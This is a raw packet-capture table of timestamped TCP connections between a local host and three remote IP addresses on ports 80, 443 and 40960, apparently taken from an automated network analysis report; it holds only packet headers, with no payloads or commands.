Jun 27, 2024 05:58:38.861586094 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.861612082 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.861612082 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.861612082 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.861705065 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.862155914 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862170935 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862184048 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862195015 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862207890 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862219095 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862231016 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862241983 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862253904 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862266064 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862267017 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.862267017 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.862267017 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.862277985 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862291098 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862301111 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:38.862320900 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.862320900 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:38.914347887 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:39.004081964 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:39.009166956 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:39.523247957 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:39.523685932 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:39.528450966 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:40.017580986 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:40.017868042 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:40.022686005 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:40.525301933 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:40.545449018 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:40.545881033 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:46.686041117 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:46.686201096 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:46.686331034 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:47.472827911 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:47.477714062 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:47.477799892 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:47.477962971 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:47.482708931 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.179364920 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.179486990 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.182729006 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.187730074 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.423357964 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.427241087 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.430171967 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.434979916 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649271011 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649286985 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649297953 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649358988 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649360895 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.649400949 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.649477959 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649487972 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649497032 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649507046 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649527073 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.649538040 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.649564028 CEST	49725	443	192.168.2.7	216.58.206.36
Jun 27, 2024 05:58:48.649580002 CEST	443	49725	216.58.206.36	192.168.2.7
Jun 27, 2024 05:58:48.649739981 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.649785995 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.650031090 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.650062084 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.650131941 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.650142908 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.650172949 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.654129028 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.654201984 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.774846077 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.774880886 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.774892092 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.774915934 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.774936914 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775002003 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775012970 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775022984 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775032997 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775039911 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775059938 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775312901 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775322914 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775353909 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775441885 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775486946 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775532961 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775542974 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775568008 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775775909 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775784969 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775794983 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.775810957 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.775831938 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.777513027 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.777522087 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.777530909 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.777637005 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.784967899 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785018921 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785028934 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785029888 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.785057068 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.785190105 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785198927 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785207987 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785223961 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.785239935 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.785360098 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.785394907 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899216890 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899241924 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899301052 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899316072 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899321079 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899391890 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899406910 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899430037 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899466991 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899518013 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899554968 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899781942 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899806976 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899842978 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.899955034 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.899991035 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900019884 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900031090 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900051117 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900067091 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900209904 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900223970 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900255919 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900268078 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900716066 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900753975 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900779009 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900789022 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900813103 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.900966883 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900978088 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.900986910 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901004076 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.901015043 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.901654005 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901690960 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.901725054 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901738882 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901758909 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.901772976 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.901896000 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901906967 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901916981 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.901941061 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.902606010 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.902646065 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.902677059 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.902687073 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.902710915 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.902720928 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.902862072 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.902870893 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.902883053 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.902899027 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.902910948 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.903578043 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.903614998 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.903646946 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.903657913 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.903681993 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.903817892 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.903826952 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.903837919 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.903856039 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.903868914 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.904527903 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.904562950 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.904596090 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.904606104 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.904628038 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.904721975 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.904731989 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.904742002 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.904757023 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.904776096 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.905703068 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.905714035 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.905723095 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.905739069 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.905759096 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.905771971 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.905781031 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.905791044 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.905808926 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.905822039 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:48.989695072 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:48.989824057 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024363041 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024394035 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024445057 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024466991 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024516106 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024527073 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024569988 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024610043 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024620056 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024655104 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024734020 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024799109 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024837971 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024844885 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024902105 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024907112 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.024970055 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.024993896 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025002956 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025012970 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025031090 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025057077 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025162935 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025283098 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025295019 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025325060 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025450945 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025460958 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025470972 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025489092 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025504112 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025641918 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025677919 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025763035 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025774002 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025801897 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025938034 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025948048 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025958061 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025968075 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.025974989 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.025994062 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.026299953 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026312113 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026336908 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026340961 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.026460886 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026472092 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026500940 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.026640892 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026652098 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026658058 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026721954 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.026813984 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026849031 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.026896954 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026906967 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.026938915 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027077913 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027089119 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027101040 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027112961 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027117014 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027132034 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027154922 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027405977 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027415991 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027425051 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027436018 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027446985 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027476072 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027683973 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027714014 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027764082 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027775049 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027805090 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027942896 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027952909 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027961969 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027972937 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.027980089 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.027992964 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028013945 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028260946 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028270960 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028280020 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028290033 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028301001 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028321028 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028600931 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028641939 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028666973 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028677940 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028703928 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028861046 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028871059 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028881073 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028886080 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.028893948 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.028918982 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.029186010 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029196978 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029205084 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029215097 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029225111 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.029251099 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.029535055 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029576063 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.029583931 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029594898 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029625893 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.029772997 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029783010 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029793024 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029807091 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.029820919 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.029835939 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.030096054 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030106068 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030114889 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030124903 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030133963 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.030159950 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.030421019 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030461073 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.030503035 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030513048 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030539989 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.030611038 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.030673981 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.113285065 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.113303900 CEST	80	49729	77.91.77.81	192.168.2.7
